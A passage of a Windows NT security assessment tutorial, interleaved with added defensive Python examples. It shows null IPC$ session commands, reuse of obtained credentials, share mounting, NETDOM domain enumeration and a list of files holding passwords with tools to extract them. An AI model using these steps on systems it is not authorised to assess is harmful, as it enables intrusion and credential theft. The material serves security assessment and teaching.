
Windows NT Assessment Techniques

Johnny Long
Johnny@ihackstuff.com

Contents

Introduction ............................................................................................................................................ 3
Windows NT Basics............................................................................................................................... 3
Terminology........................................................................................................................................ 3
Scoping the target.................................................................................................................................. 4
NBTSTAT: The First Step ................................................................................................................. 4
IP-to NETBIOS Name mapping ........................................................................................................ 7
IPC shares.......................................................................................................................................... 9
NULL IPC shares ......................................................................................................................... 10
IPC Upgrading .............................................................................................................................. 10
Information Gathering.......................................................................................................................... 11
NET VIEW command ...................................................................................................................... 11
Mounting Shares .............................................................................................................................. 12
Share “Crawling” .............................................................................................................................. 13
NetDom Utility .................................................................................................................................. 14
NETDOM QUERY........................................................................................................................ 15
NETDOM BDC ............................................................................................................................. 16
NETDOM Member ....................................................................................................................... 17
NETDOM Master.......................................................................................................................... 18
NETDOM Resource ..................................................................................................................... 19
USER2SID........................................................................................................................................ 20
SID2USER........................................................................................................................................ 21
Getting Userlists .................................................................................................................................. 22
SID reversal .................................................................................................................................. 22
EnumUsers (QTIP)....................................................................................................................... 23
EnumUsers: (net users)............................................................................................................... 23
Splinter .......................................................................................................................................... 24
Ntinfo ............................................................................................................................................. 26
NTSplitter ...................................................................................................................................... 27
Username/Password Guessing .......................................................................................................... 28
IPC connections ........................................................................................................................... 28
Netbios Auditing Tool (NAT)........................................................................................................ 29
Exploitation Techniques ...................................................................................................................... 30
Netcat................................................................................................................................................ 30
Trojan Planting: Elitewrap ............................................................................................................... 31
Remote Attacks................................................................................................................................ 34
Remote registry updates ............................................................................................................. 34
Password Sniffing ........................................................................................................................ 36
Password Cracking – L0phtcrack ............................................................................................... 37
Local Advancement Attacks............................................................................................................ 39
GETADMIN................................................................................................................................... 39
“SECHOLE” .................................................................................................................................. 40
Application Attacks .............................................................................................................................. 41
Microsoft Internet Information Server 3.0....................................................................................... 41
Information Gathering (IG)........................................................................................................... 41
IIS 3.0 WWW Server Default Files and Directories: .................................................................. 43
IIS 3.0 WWW Default Service Properties ................................................................................... 46
IIS 3.0 FTP Default Service Properties....................................................................................... 47
IIS 3.0 Gopher Default Service Properties ................................................................................. 48
Microsoft Internet Information Server 4.0....................................................................................... 49
IIS Remote Overflow .................................................................................................................... 49
IIS 4.0 WWW Server Default Files and Directories: .................................................................. 49
IIS 3.0 WWW Server Hidden Files and Directories: .................................................................. 60
ColdFusion ....................................................................................................................................... 62

Introduction
Windows NT Vulnerability Assessments are very similar to UNIX-targeted assessments as far as
methodology is concerned. For that reason, Vulnerability Assessment methodology will not be
covered in this lesson. Several technology differences set Windows NT apart from UNIX, and
those differences are the subject of this paper.

After finishing this lesson, students should be able to:

• Remotely identify Windows NT machines
• Gather information from Windows NT machines
• Determine Usernames and Policies on Windows NT machines
• Launch Brute-force attacks against Windows NT machines
• Advance privileges on standard Windows NT users

Windows NT Basics

Terminology

SID – security ID:

A unique name that identifies a logged-on user to the security system. Security IDs (SIDs) can
identify one user, or a group of users.

SAM – Security Accounts Manager:

A database of security information such as user account names and passwords, and the security
policy settings. For Windows NT Workstation, the directory database is managed using User
Manager. For a Windows NT Server domain, it is managed using User Manager for Domains.

Server:

A stand-alone Windows NT machine which contains its own Authentication information.

Domain:

A model of NT networking which centralizes all Authentication information and functionality into a
single machine or group of machines.

Scoping the target

NBTSTAT: The First Step

NBTSTAT Shows Services running, Names and Domain Configuration info

Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).

NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n]
        [-r] [-R] [-s] [-S] [interval] ]

  -a   (adapter status) Lists the remote machine's name table given its name
  -A   (Adapter status) Lists the remote machine's name table given its
                        IP address.
  -c   (cache)          Lists the remote name cache including the IP addresses
  -n   (names)          Lists local NetBIOS names.
  -r   (resolved)       Lists names resolved by broadcast and via WINS
  -R   (Reload)         Purges and reloads the remote cache name table
  -S   (Sessions)       Lists sessions table with the destination IP addresses
  -s   (sessions)       Lists sessions table converting destination IP
                        addresses to host names via the hosts file.

  RemoteName   Remote host machine name.
  IP address   Dotted decimal representation of the IP address.
  interval     Redisplays selected statistics, pausing interval seconds
               between each display. Press Ctrl+C to stop redisplaying
               statistics.

From the Rhino9 “wardoc”:

The column headings generated by NBTSTAT have the following meanings:

Input
Number of bytes received.
Output
Number of bytes sent.
In/Out
Whether the connection is from the computer (outbound) or from another
system to the local computer (inbound).
Life
The remaining time that a name table cache entry will "live" before your
computer purges it.
Local Name
The local NetBIOS name given to the connection.
Remote Host
The name or IP address of the remote host.
Type
A name can have one of two types: unique or group.
The last byte of the 16 character NetBIOS name often means something
because the same name can be present multiple times on the same computer.
This shows the last byte of the name converted into hex.

State
Your NetBIOS connections will be shown in one of the following "states":

State          Meaning

Accepting      An incoming connection is in process.

Associated     The endpoint for a connection has been created and your
               computer has associated it with an IP address.

Connected      This is a good state! It means you're connected to the remote
               resource.

Connecting     Your session is trying to resolve the name-to-IP address
               mapping of the destination resource.

Disconnected   Your computer requested a disconnect, and it is waiting for
               the remote computer to do so.

Disconnecting  Your connection is ending.

Idle           The remote computer has been opened in the current session,
               but is currently not accepting connections.

Inbound        An inbound session is trying to connect.

Listening      The remote computer is available.

Outbound       Your session is creating the TCP connection.

Reconnecting   If your connection failed on the first attempt, it will
               display this state as it tries to reconnect.

Name Number Type Usage
=========================================================================
<computername> 00 U Workstation Service
<computername> 01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
<computername> 03 U Messenger Service
<computername> 06 U RAS Server Service
<computername> 1F U NetDDE Service
<computername> 20 U File Server Service
<computername> 21 U RAS Client Service
<computername> 22 U Exchange Interchange
<computername> 23 U Exchange Store
<computername> 24 U Exchange Directory
<computername> 30 U Modem Sharing Server Service
<computername> 31 U Modem Sharing Client Service
<computername> 43 U SMS Client Remote Control
<computername> 44 U SMS Admin Remote Control Tool
<computername> 45 U SMS Client Remote Chat
<computername> 46 U SMS Client Remote Transfer
<computername> 4C U DEC Pathworks TCPIP Service
<computername> 52 U DEC Pathworks TCPIP Service
<computername> 87 U Exchange MTA
<computername> 6A U Exchange IMC
<computername> BE U Network Monitor Agent
<computername> BF U Network Monitor Apps
<username> 03 U Messenger Service
<domain> 00 G Domain Name
<domain> 1B U Domain Master Browser
<domain> 1C G Domain Controllers
<domain> 1D U Master Browser
<domain> 1E G Browser Service Elections
<INet~Services> 1C G Internet Information Server
<IS~Computer_name> 00 U Internet Information Server
<computername> [2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
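To turn the suffix table into something an administrator can run over their own hosts, here is an added example (not part of the original paper or the Rhino9 wardoc) that parses the name table printed by nbtstat -A and maps each entry to the usage listed above. The sample output is constructed in the NT 4.0 nbtstat layout; the host, domain and user names in it are invented.

```python
"""Decode an ``nbtstat -A`` name table into the services it advertises.

Added example, not from the original paper: the (suffix, type) -> usage
mapping is the table reproduced on the page; the sample output below is
constructed, not captured from a real host.
"""
import re

# (last byte of the NetBIOS name, U=unique / G=group) -> usage, per the
# page's table. Entries whose meaning depends on the name prefix (IIS)
# are handled in decode_name().
SUFFIX_USAGE = {
    ("00", "U"): "Workstation Service",       ("00", "G"): "Domain Name",
    ("01", "U"): "Messenger Service",         ("01", "G"): "Master Browser",
    ("03", "U"): "Messenger Service",         ("06", "U"): "RAS Server Service",
    ("1B", "U"): "Domain Master Browser",     ("1C", "G"): "Domain Controllers",
    ("1D", "U"): "Master Browser",            ("1E", "G"): "Browser Service Elections",
    ("1F", "U"): "NetDDE Service",            ("20", "U"): "File Server Service",
    ("21", "U"): "RAS Client Service",        ("22", "U"): "Exchange Interchange",
    ("23", "U"): "Exchange Store",            ("24", "U"): "Exchange Directory",
    ("2B", "U"): "Lotus Notes Server",        ("2F", "G"): "Lotus Notes",
    ("30", "U"): "Modem Sharing Server Service",
    ("31", "U"): "Modem Sharing Client Service",
    ("33", "G"): "Lotus Notes",               ("43", "U"): "SMS Client Remote Control",
    ("44", "U"): "SMS Admin Remote Control Tool",
    ("45", "U"): "SMS Client Remote Chat",    ("46", "U"): "SMS Client Remote Transfer",
    ("4C", "U"): "DEC Pathworks TCPIP Service",
    ("52", "U"): "DEC Pathworks TCPIP Service",
    ("6A", "U"): "Exchange IMC",              ("87", "U"): "Exchange MTA",
    ("BE", "U"): "Network Monitor Agent",     ("BF", "U"): "Network Monitor Apps",
}

# One row of "Name <xx> TYPE Status". The name may contain dots or spaces
# (the ..__MSBROWSE__. entry), so it is matched non-greedily up to the <xx>.
ROW = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")


def parse_name_table(text):
    """Return [(name, suffix, 'U'|'G', status)] for each table row."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            rows.append((name, suffix.upper(), kind[0], status))
    return rows


def decode_name(name, suffix, kind):
    """Map one (name, suffix, type) row to the usage from the page's table."""
    if name.startswith("INet~Services") and (suffix, kind) == ("1C", "G"):
        return "Internet Information Server"
    if name.startswith("IS~") and (suffix, kind) == ("00", "U"):
        return "Internet Information Server"
    return SUFFIX_USAGE.get((suffix, kind), "unknown (%s/%s)" % (suffix, kind))


def summarize(text):
    """Derive the host facts a defender wants from one nbtstat -A listing."""
    rows = parse_name_table(text)
    computer = next((n for n, s, k, _ in rows if (s, k) == ("00", "U")), None)
    domain = next((n for n, s, k, _ in rows if (s, k) == ("00", "G")), None)
    # A unique <03> name that is not the computer name is a logged-on user
    # (the page lists <username> 03 U under Messenger Service).
    users = sorted(n for n, s, k, _ in rows
                   if (s, k) == ("03", "U") and n != computer)
    return {
        "computer": computer,
        "domain": domain,
        "services": sorted({decode_name(n, s, k) for n, s, k, _ in rows}),
        "logged_on_users": users,
        "domain_controller": any((s, k) == ("1C", "G") for _, s, k, _ in rows),
        "file_server": any((s, k) == ("20", "U") for _, s, k, _ in rows),
    }


# Constructed sample in the layout of NT 4.0 "nbtstat -A" output.
SAMPLE = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
SWALLOW        <00>  UNIQUE      Registered
AERIE          <00>  GROUP       Registered
SWALLOW        <03>  UNIQUE      Registered
SWALLOW        <20>  UNIQUE      Registered
AERIE          <1C>  GROUP       Registered
AERIE          <1B>  UNIQUE      Registered
JDOE           <03>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-00-00-00-00-00
"""

if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print("%-18s %s" % (key, value))
```

The summary makes the exposure of a host explicit: a <1C> group entry means it answers as a domain controller, a <20> entry means it offers file shares, and any <03> name other than the computer name tells you which user is logged on, all of which is visible to anyone who can reach the NetBIOS port.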

IP-to NETBIOS Name mapping

In order for Windows NT to understand the correlation between IP addresses and NETBIOS
machine names, a WINS server must be consulted. If a WINS server has not been located, the
mappings can be performed manually using the file
%WINNT%\system32\drivers\etc\lmhosts.

By default, a sample of this file is included on NT installations as
%WINNT%\system32\drivers\etc\lmhosts.sam

This file should look like this:

# Copyright (c) 1993-1995 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows
# NT.
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the comptername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:<domain>
# #INCLUDE <filename>
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:<domain>" tag will associate the
# entry with the domain specified by <domain>. This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The <domain> is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE <filename>" will force the RFC NetBIOS (NBT)
# software to seek the specified <filename> and parse it as if it were
# local. <filename> is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addition the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#

# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname \0x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.

This file works much like an /etc/hosts file under UNIX. Create a copy of this file, and save it as
“%WINNT%\system32\drivers\etc\lmhosts”

Make sure that the file is not saved as
“%WINNT%\system32\drivers\etc\lmhosts.txt”

The .txt extension should not be present!

Populate this file with IP addresses and NETBIOS names as follows:

10.10.10.1 BOX1 #PRE
10.10.10.2 BOX2 #PRE #DOM:DOMAIN1

The NETBIOS names can be retrieved from your nbtstat listings.

In the example above, 10.10.10.1 will be known as “BOX1”, while 10.10.10.2 will be known as
“BOX2”. In addition, “BOX2” is known to be a member of the domain “DOMAIN1”.

In order for NT to read this file, issue the following command:

nbtstat -R

To list your IP-to-NETBIOS mappings, issue the command:

nbtstat -c

Be sure to enable LMHOSTS lookup under NETWORK|PROTOCOLS|TCP/IP|WINS.
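As an added example, not part of the paper or of Microsoft's lmhosts.sam, the following parser implements the entry syntax and extensions the sample file documents (#PRE, #DOM:, #INCLUDE, #BEGIN_/#END_ALTERNATE, quoted names with \0xnn escapes) and checks the pitfalls described above: a #INCLUDE whose server has no earlier #PRE mapping, a #DOM entry without #PRE, and the file being saved with a .txt extension. The sample file it reads is constructed from the page's own example lines plus one deliberately broken #INCLUDE; padding quoted names to 16 bytes is this example's simplification.

```python
"""Parse and sanity-check an LMHOSTS file (added example, not from the paper)."""
import re

ESCAPE = re.compile(r"\\0x([0-9A-Fa-f]{2})")          # \0xnn inside a quoted name
UNC_SERVER = re.compile(r"^\\\\([^\\]+)\\")            # \\server\... -> server
ENTRY = re.compile(r'^(\S+)\s+("[^"]*"|\S+)\s*(.*)$')  # ip, name, trailing tags/comment
DOTTED_QUAD = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def decode_netbios_name(raw):
    """Quoted names are taken literally with \\0xnn escapes decoded; plain names upper-cased."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        text = ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), raw[1:-1])
        return text.ljust(16)[:16]   # simplification: space-pad to the 16-byte name
    return raw.upper()


def parse_lmhosts(text):
    """Return (entries, includes, problems) for one LMHOSTS file."""
    entries, includes, problems = [], [], []
    preloaded = set()            # names seen with #PRE so far; file order matters
    in_alternate = False
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        upper = line.upper()
        if upper.startswith("#INCLUDE"):
            parts = line.split(None, 1)
            target = parts[1].strip() if len(parts) > 1 else ""
            m = UNC_SERVER.match(target)
            if not m:
                problems.append("line %d: #INCLUDE without a UNC path" % lineno)
            elif m.group(1).upper() not in preloaded:
                # The file's own rule: the include server must be mapped with #PRE first.
                problems.append("line %d: #INCLUDE server %s has no earlier #PRE mapping"
                                % (lineno, m.group(1).upper()))
            includes.append({"line": lineno, "path": target, "alternate": in_alternate})
            continue
        if upper.startswith("#BEGIN_ALTERNATE"):
            if in_alternate:
                problems.append("line %d: nested #BEGIN_ALTERNATE" % lineno)
            in_alternate = True
            continue
        if upper.startswith("#END_ALTERNATE"):
            if not in_alternate:
                problems.append("line %d: #END_ALTERNATE without #BEGIN_ALTERNATE" % lineno)
            in_alternate = False
            continue
        if line.startswith("#"):
            continue                 # plain comment (still parsed on every lookup, as the file warns)
        m = ENTRY.match(line)
        if not m:
            problems.append("line %d: unparsable entry" % lineno)
            continue
        ip, rawname, rest = m.groups()
        if not DOTTED_QUAD.match(ip):
            problems.append("line %d: %r is not a dotted-decimal address" % (lineno, ip))
        pre = re.search(r"#PRE\b", rest, re.I) is not None
        dom = re.search(r"#DOM:(\S+)", rest, re.I)
        if dom and not pre:
            problems.append("line %d: #DOM without #PRE, host will not be preloaded" % lineno)
        name = decode_netbios_name(rawname)
        if pre:
            preloaded.add(name.strip().upper())
        entries.append({"line": lineno, "ip": ip, "name": name, "pre": pre,
                        "domain": dom.group(1).upper() if dom else None})
    if in_alternate:
        problems.append("#BEGIN_ALTERNATE never closed")
    return entries, includes, problems


def check_filename(path):
    """The page's warning: NT ignores lmhosts.txt; the file must have no extension."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower() == "lmhosts"


# Constructed sample: the lmhosts.sam example lines, the page's BOX1/BOX2
# entries, and one deliberately bad #INCLUDE to exercise the check.
SAMPLE = r"""
# constructed sample file
102.54.94.97   rhino      #PRE #DOM:networking  #net group's DC
102.54.94.102  "appname \0x14"                  #special app server
102.54.94.123  popular    #PRE                  #source server
102.54.94.117  localsrv   #PRE                  #needed for the include
10.10.10.1     BOX1       #PRE
10.10.10.2     BOX2       #PRE #DOM:DOMAIN1

#BEGIN_ALTERNATE
#INCLUDE \\localsrv\public\lmhosts
#INCLUDE \\rhino\public\lmhosts
#END_ALTERNATE
#INCLUDE \\nowhere\public\lmhosts
"""

if __name__ == "__main__":
    ents, incs, probs = parse_lmhosts(SAMPLE)
    for e in ents:
        print("%-15s %-16r pre=%-5s dom=%s" % (e["ip"], e["name"], e["pre"], e["domain"]))
    for p in probs:
        print("PROBLEM:", p)
```

Run it against the real file before issuing nbtstat -R: a mapping that silently fails to preload, or an include that can never be read, only shows up later as a name that will not resolve.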

IPC shares

IPC, or Inter-process Communication, is a default share on all Windows NT machines. This
share is generally used for server-to-server communications. Whenever a new connection is
made to a server, an IPC$ connection is established automatically, transparent to the user. To
connect to the IPC$ share, the NET USE command can be employed.

The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
        [/USER:[domainname\]username]
        [[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

NET USE connects a computer to a shared resource or disconnects a
computer from a shared resource. When used without options, it lists
the computer's connections.

devicename     Assigns a name to connect to the resource or specifies
               the device to be disconnected. There are two kinds of
               devicenames: disk drives (D: through Z:) and printers
               (LPT1: through LPT3:). Type an asterisk instead of a
               specific devicename to assign the next available
               devicename.
\\computername Is the name of the computer controlling the shared
resource. If the computername contains blank characters,
enclose the double backslash (\\) and the computername
in quotation marks (" "). The computername may be from
1 to 15 characters long.
\sharename Is the network name of the shared resource.
\volume Specifies a NetWare volume on the server. You must have
Client Services for Netware (Windows NT Workstations)
or Gateway Service for Netware (Windows NT Server)
installed and running to connect to NetWare servers.
password Is the password needed to access the shared resource.
* Produces a prompt for the password. The password is
not displayed when you type it at the password prompt.
/USER Specifies a different username with which the connection
is made.
domainname Specifies another domain. If domain is omitted,
the current logged on domain is used.
username Specifies the username with which to logon.
/HOME Connects a user to their home directory.
/DELETE Cancels a network connection and removes the connection
from the list of persistent connections.
/PERSISTENT Controls the use of persistent network connections.
The default is the setting used last.
YES Saves connections as they are made, and restores
them at next logon.
NO Does not save the connection being made or subsequent
connections; existing connections will be restored at
next logon. Use the /DELETE switch to remove
persistent connections.
NET HELP command | MORE displays Help one screen at a time.

NULL IPC shares

By default, NT servers allow a “NULL” IPC connection. This enables foreign servers to determine
certain types of information without a username or password on the server. A NULL IPC$
connection is very similar to a standard IPC$ connection, which is made as follows:

NET USE \\IP_ADDR\IPC$ "password" /USER:"joeuser"

In the above example, the user “joeuser” is connecting to \\IP_ADDR with a password of
“password”.

To perform a “NULL” IPC$ connection, use the following syntax:

NET USE \\IP_ADDR\IPC$ "" /USER:""

This will connect to the IPC$ on \\IP_ADDR as the user “” (NULL) with a password of “” (NULL)!

It is possible to disallow these anonymous connections, in which case this command will fail.

IPC Upgrading

Later, once a username and password combination has been obtained, this IPC$ connection can
be “upgraded” to the credentials of that user. Upgrading your IPC connection will effectively give
you the same permissions as that user whenever you access that server.

To upgrade an IPC connection, first delete the existing connection:

NET USE \\IP_ADDR\IPC$ /delete

Then, connect back to the server with your new credentials:

NET USE \\IP_ADDR\IPC$ "badpassword" /USER:"joeuser"

Information Gathering

NET VIEW command

Once a connection is made to the remote machine, attempt to perform a net view command on
the target.

The syntax of this command is:

NET VIEW [\\computername | /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [\\computername]

NET VIEW displays a list of resources being shared on a computer. When used
without options, it displays a list of computers in the current domain or
network.

\\computername      Is a computer whose shared resources you want
                    to view.
/DOMAIN:domainname  Specifies the domain for which you want to
                    view the available computers. If domainname is
                    omitted, displays all domains in the local area
                    network.
/NETWORK:NW         Displays all available servers on a NetWare
                    network. If a computername is specified, the
                    resources available on that computer in
                    the NetWare network will be displayed.

Example:

E:\RESKIT>net view \\172.16.101.200
Shared resources at \\172.16.101.200

Share name Type Used as Comment

-------------------------------------------------------------------------------
Clients Disk
i386 Disk
NETLOGON Disk Logon server share
The command completed successfully.

This will show share information about the server. This information may not have been available
without the NULL IPC$ connection.

Mounting Shares

Now armed with a list of shares on the remote servers, we can attempt to mount these shares on
our local machine using the “net use” command.

Example:

C:\> net use \\IP_ADDRESS\IPC$ "" /user:""
The command completed successfully.

C:\> net use X: \\IP_ADDRESS\SHARE

This will attempt to connect your X: drive to the \\IP_ADDRESS\SHARE share with a null
password and a null username. If successful, the following message is displayed:

The command completed successfully.

In addition, your local X: drive will now be connected to the \\IP_ADDRESS\SHARE share.

Later in the assessment, once you have determined a proper username/password combination,
upgrade your IPC connection and try the share mount again. NAT (discussed later) will also tell
you if that user has permission to mount that share.

Note on Windows NT shares: Windows NT does not allow “anonymous share access.” In other
words, a valid username and password must be used to access shares on Windows NT Servers.
When trying to connect across a Null IPC$ connection, a Windows NT share will prompt you for a
password. This prompt is requesting the password for the account you are logged in as. In other
words, if you are logged into your machine as administrator, you need to type the password for
administrator on the target box to gain access to the share.

Share “Crawling”

From the Rhino9 “Wardoc”:

Many files contain sensitive information:

• Eudora.ini: Eudpass.com extracts email passwords

• Tree.dat: Used by cuteFTP to store passwords. Use FireFTP to crack passwords.

• .PWL files store Windows client passwords. Use glide.exe to extract passwords

• .PWD files store FrontPage/Personal Webserver plaintext usernames and passwords

• WS_FTP.ini used by ws_ftp to store passwords. The encryption is weak.

• .IDC files contain username/password information about webservers accessing databases.

• Waruser.dat is used by WarFTP. Beta version 1.70 contains the Root FTP password.

• $winnt$.inf is the data file used for Unattended Windows NT installations. A username and
password may be contained in this file.

• SAM._ is a copy of the SAM database. Passwords can be dumped with SAMDUMP and
cracked offline.

• ExchVerify.log is created by Cheyenne/Innoculan/ArcServe and contains username and
password information.
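For an administrator auditing their own file shares, here is an added example (not from the paper or the Rhino9 wardoc) that walks a share mounted on a local drive and reports every file whose name is on the list above, so the credential-bearing files can be removed before anyone crawls for them. The pattern list and reasons come from the page; the directory layout the example builds in a temporary folder is constructed for the demonstration.

```python
"""Find credential-bearing files on a share (added example, not from the paper)."""
import fnmatch
import os
import tempfile

# (glob pattern, why it matters), taken from the list on the page.
# Matching is case-insensitive because NT file names are.
SENSITIVE = [
    ("eudora.ini", "Eudora mail passwords"),
    ("tree.dat", "CuteFTP stored passwords"),
    ("*.pwl", "Windows client password list"),
    ("*.pwd", "FrontPage/Personal Web Server plaintext credentials"),
    ("ws_ftp.ini", "WS_FTP stored passwords (weak encryption)"),
    ("*.idc", "IDC file, may hold database credentials"),
    ("waruser.dat", "WarFTP user database"),
    ("$winnt$.inf", "unattended-install answer file, may hold credentials"),
    ("sam._", "copy of the SAM database"),
    ("exchverify.log", "ArcServe/Inoculan log with credentials"),
]


def classify(filename):
    """Return the reason a file name is sensitive, or None if it is not listed."""
    lower = filename.lower()
    for pattern, reason in SENSITIVE:
        if fnmatch.fnmatchcase(lower, pattern):
            return reason
    return None


def audit_tree(root):
    """Walk root (e.g. a drive letter a share is mounted on) and return
    sorted [(relative path, reason)] for every sensitive file found."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            reason = classify(name)
            if reason:
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                hits.append((rel.replace(os.sep, "/"), reason))
    return sorted(hits)


def build_sample_share(root):
    """Create a constructed share layout with several hits and some noise files."""
    layout = [
        "users/jdoe/Eudora.ini",
        "users/jdoe/WS_FTP.ini",
        "users/jdoe/notes.doc",
        "users/asmith/windows/ASMITH.PWL",
        "inetpub/scripts/orders.idc",
        "repair/SAM._",
        "i386/$WINNT$.INF",
        "readme.txt",
    ]
    for rel in layout:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample file\n")
    return root


def run_sample_audit():
    """Build the constructed share in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_tree(build_sample_share(tmp))


if __name__ == "__main__":
    for path, reason in run_sample_audit():
        print("%-36s %s" % (path, reason))
```

Point audit_tree at the drive letter of a mounted share (X: in the section above) to run it for real; anything it reports is readable by every account that can mount that share.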

NetDom Utility

The netdom command can be used to gather NT network information. There
are several major options available to the program, and they are
detailed below.

NetDom 1.7 @1997. Written by Christophe Robert (chrisrob@microsoft.com).

The syntax of this command is:

NETDOM [/Options] command
    - or -
NETDOM HELP command

Commands available are:

NETDOM BDC      NETDOM HELP     NETDOM MASTER
NETDOM MEMBER   NETDOM QUERY    NETDOM RESOURCE

Options are as follows:

Options Description
-----------------------------------------------------------------------
/D[OMAIN]:DOMAINNAME Performs the operation on the primary domain
controller of the domain DOMAINNAME.
If this option is not used then the domain
is the one of which the workstation or the
server is a server. If the computer is a
domain controller, the operation takes place
on the current domain.

/U[SER]:DOMAIN\USER     User account used to make the connection with
                        the primary domain controller on which the
                        action is to be performed.
                        If this option is not used, the current user
                        account is used.

/P[ASSWORD]:password    Password of the user account defined along with
                        the option /USER.

/NOVERBOSE              Not verbose. Displays only the results of the
                        performed operation.

NETDOM QUERY
Queries computers domain information and checks secure channels.
It can be run for any domain member or BDC.

Example:

E:\RESKIT>netdom query \\swallow
NetDom 1.7 @1997. Written by Christophe Robert (chrisrob@microsoft.com).

Querying domain information on computer \\SWALLOW ...
Computer \\SWALLOW is a domain controller of AERIE.
Searching PDC for domain AERIE ...
Found PDC \\SWALLOW
Connecting to \\SWALLOW ...
Computer \\SWALLOW is the PDC of AERIE.

In this example, a null IPC connection was made to \\SWALLOW, and an lmhosts entry exists
that lists:

172.16.101.200 SWALLOW #PRE #DOM:AERIE

This way, your attack machine knows the IP address and the domain association of \\SWALLOW.

NETDOM BDC
Commands are as follows:

Command Description
-----------------------------------------------------------------------
No command Lists the BDCs of the domain. Must be used
without any BDC name.

/ADD Adds a computer account for the BDC.

/DELETE Removes the computer account for the BDC.

/QUERY          Queries domain information of the BDC and
                checks the secure channel.

/RESET Resets secure channel of the BDC.

Example:

E:\RESKIT>netdom /d:aerie bdc
NetDom 1.7 @1997. Written by Christophe Robert (chrisrob@microsoft.com).

Searching PDC for domain AERIE ...
Found PDC \\SWALLOW
Connecting to \\SWALLOW ...
Listing BDCs of AERIE ...

BDC 1 = \\MAGPIE

In this example, a null IPC connection was made to \\SWALLOW, and an lmhosts entry exists
that lists:

172.16.101.201 SWALLOW #PRE #DOM:AERIE

This way, your attack machine knows the IP address and the domain association of \\SWALLOW.

NETDOM Member
Commands are as follows:

Command Description
-----------------------------------------------------------------------
No command Lists the members of the domain. Must be used
without any member name.

/JOINDOMAIN     Joins a domain. Resets the secure channel if the
                member was already in the domain.

/JOINWORKGROUP WORKGROUP Joins a workgroup.

/ADD Adds a computer account for the member.

/DELETE Removes the computer account for the member.

/QUERY Queries domain information of the member.

Example:

E:\RESKIT>netdom /d:aerie member
NetDom 1.7 @1997. Written by Christophe Robert (chrisrob@microsoft.com).

Searching PDC for domain AERIE ...
Found PDC \\SWALLOW
Connecting to \\SWALLOW ...
Listing members of domain AERIE ...

Member 1 = \\DUCK
Member 2 = \\NT2
Member 3 = \\NT4
Member 4 = \\NT5
Member 5 = \\NT6
Member 6 = \\NT7
Member 7 = \\NTKWS001
Member 8 = \\PELICAN
Member 9 = \\PENGUIN
Member 10 = \\QUAIL

In this example, a null IPC connection was made to \\SWALLOW, and an lmhosts entry exists
that lists:

172.16.101.202 SWALLOW #PRE #DOM:AERIE

This way, your attack machine knows the IP address and the domain association of \\SWALLOW.

NETDOM Master
Commands are as follows:

Command Description
-----------------------------------------------------------------------
